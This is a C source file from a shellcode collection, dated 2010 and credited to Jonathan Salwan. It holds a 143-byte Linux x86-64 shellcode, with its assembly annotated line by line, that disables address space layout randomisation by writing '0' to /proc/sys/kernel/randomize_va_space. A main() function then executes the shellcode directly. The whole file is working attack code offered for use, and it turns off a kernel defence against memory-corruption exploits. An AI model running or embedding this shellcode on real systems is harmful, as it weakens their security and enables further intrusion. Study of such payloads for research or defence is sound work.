/*
Title: Linux/x86-64 - Disable ASLR Security - 143 bytes
Date: 2010-06-17
Tested: Archlinux x86_64 k2.6.33
Author: Jonathan Salwan
Web: http://shell-storm.org | http://twitter.com/jonathansalwan
! Dtabase of shellcodes http://www.shell-storm.org/shellcode/
Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.
This shellcode disables the ASLR.
*/
#include <stdio.h>
char *SC =
/* open("/proc/sys/kernel/randomize_va_space", O_WRONLY|O_CREAT|O_APPEND, 0644) */
"\x48\x31\xd2" // xor %rdx,%rdx
"\x48\xbb\xff\xff\xff\xff\xff\x61\x63\x65" // mov $0x656361ffffffffff,%rbx
"\x48\xc1\xeb\x28" // shr $0x28,%rbx
"\x53" // push %rbx
"\x48\xbb\x7a\x65\x5f\x76\x61\x5f\x73\x70" // mov $0x70735f61765f657a,%rbx
"\x53" // push %rbx
"\x48\xbb\x2f\x72\x61\x6e\x64\x6f\x6d\x69" // mov $0x696d6f646e61722f,%rbx
"\x53" // push %rbx
"\x48\xbb\x73\x2f\x6b\x65\x72\x6e\x65\x6c" // mov $0x6c656e72656b2f73,%rbx
"\x53" // push %rbx
"\x48\xbb\x2f\x70\x72\x6f\x63\x2f\x73\x79" // mov $0x79732f636f72702f,%rbx
"\x53" // push %rbx
"\x48\x89\xe7" // mov %rsp,%rdi
"\x66\xbe\x41\x04" // mov $0x441,%si
"\x66\xba\xa4\x01" // mov $0x1a4,%dx
"\x48\x31\xc0" // xor %rax,%rax
"\xb0\x02" // mov $0x2,%al
"\x0f\x05" // syscall
/* write(3, "0\n", 2) */
"\x48\xbf\xff\xff\xff\xff\xff\xff\xff\x03" // mov $0x3ffffffffffffff,%rdi
"\x48\xc1\xef\x38" // shr $0x38,%rdi
"\x48\xbb\xff\xff\xff\xff\xff\xff\x30\x0a" // mov $0xa30ffffffffffff,%rbx
"\x48\xc1\xeb\x30" // shr $0x30,%rbx
"\x53" // push %rbx
"\x48\x89\xe6" // mov %rsp,%rsi
"\x48\xba\xff\xff\xff\xff\xff\xff\xff\x02" // mov $0x2ffffffffffffff,%rdx
"\x48\xc1\xea\x38" // shr $0x38,%rdx
"\x48\x31\xc0" // xor %rax,%rax
"\xb0\x01" // mov $0x1,%al
"\x0f\x05" // syscall
/* _exit(0) */
"\x48\x31\xff" // xor %rdi,%rdi
"\x48\x31\xc0" // xor %rax,%rax
"\xb0\x3c" // mov $0x3c,%al
"\x0f\x05"; // syscall
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC));
(*(void(*)()) SC)();
return 0;
}
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